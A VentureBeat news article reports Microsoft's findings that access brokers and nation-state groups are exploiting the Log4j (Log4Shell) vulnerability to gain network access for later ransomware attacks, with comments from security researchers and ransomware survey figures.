Join top executives in San Francisco on July 11-12, to hear how leaders are integrating and optimizing AI investments for success. Learn More

Microsoft said it has observed multiple cybercriminal groups seek to establish network access by exploiting the vulnerability in Apache Log4j, with the expected goal of later selling that access to ransomware operators.

The arrival of these “access brokers,” who’ve been linked to ransomware affiliates, suggests that an “increase in human-operated ransomware” may follow against both Windows and Linux systems, the company said in an update to a blog post on the critical Log4j vulnerability, known as Log4Shell.

Nation-state activity

In the same post, Microsoft also said it has observed activity from nation-state groups—tied to countries including China, Iran, North Korea, and Turkey—seeking to exploit the Log4j vulnerability. In one instance, an Iranian group known as Phosphorus, which has previously deployed ransomware, has been seen “acquiring and making modifications of the Log4j exploit,” Microsoft said. “We assess that PHOSPHORUS has operationalized these modifications.”

The development has followed shortly after the first instances of ransomware payloads exploiting Log4Shell were disclosed. Security researchers at Bitdefender observed an attempt to deploy a new strain of ransomware, Khonsari, using the Log4Shell vulnerability that was revealed publicly last Thursday.


Transform 2023

Join us in San Francisco on July 11-12, where top executives will share how they have integrated and optimized AI investments for success and avoided common pitfalls.


Register Now

Researchers have also told VentureBeat that they’ve observed attackers potentially laying the groundwork for launching ransomware in a range of ways, such as deploying privilege escalation tools and bringing malicious Cobalt Strike servers online, in recent days. Cobalt Strike is a popular tool for enabling remote reconnaissance and lateral movement in ransomware attacks.

Microsoft itself, on Saturday, had reported seeing the installation of Cobalt Strike through the exploitation of the Log4j vulnerability.


Now, Microsoft said it has observed activities by cybercriminals aimed at establishing a foothold inside a network using Log4Shell, with the expectation of selling that access to a “ransomware-as-a-service” operator.

In the blog post update, Microsoft’s threat research teams said that they “have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks.”

“These access brokers then sell access to these networks to ransomware-as-a-service affiliates,” the Microsoft researchers said in the post.

The researchers noted that they have “observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.”

Ransomware-as-a-service operators lease out ransomware variants to other attackers, saving them the effort of creating their own variants.

A growing threat

According to a previous report from Digital Shadows, “initial access brokers” have had a “growing role” in the cybercriminal space.

“Rather than infiltrating an organization deeply, this type of threat actor operates as a ‘middleman’ by breaching as many companies as possible and goes on to sell access to the highest bidder – often to ransomware groups,” Digital Shadows said.

Sean Gallagher, a senior threat researcher at Sophos, told VentureBeat on Tuesday that he has been expecting to see targeted efforts to plant backdoors in networks, including by access brokers who would then sell the backdoor to other criminals. “And those other criminals will inevitably include ransomware gangs,” Gallagher said.

At the time of this writing, there has been no public disclosure of a successful ransomware breach that exploited the vulnerability in Log4j.

Widespread vulnerability

All in all, researchers said they do expect ransomware attacks to result from the vulnerability in Log4j, as the flaw is both widespread and considered trivial to exploit. Many applications and services written in Java are potentially vulnerable to Log4Shell, which can enable remote execution of code by unauthenticated users. Researchers at cybersecurity giant Check Point said they’ve observed attempted exploits of the Log4j vulnerability on more than 44% of corporate networks worldwide.

“We haven’t necessarily seen direct ransomware deployment, but it’s just a matter of time,” said Nick Biasini, head of outreach at Cisco Talos, in an email Tuesday. “This is a high-severity vulnerability that can be found in countless products. The time required for everything to be patched alone will allow various threat groups to leverage this in a variety of attacks, including ransomware.”

The vulnerability comes with the majority of businesses already reporting that they’ve had first-hand experience with ransomware over the past year. A recent survey from CrowdStrike found that 66% of organizations had experienced a ransomware attack in the previous 12 months, up from 56% in 2020. And the average ransomware payment has surged by about 63% in 2021, reaching $1.79 million, the report said.

VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings.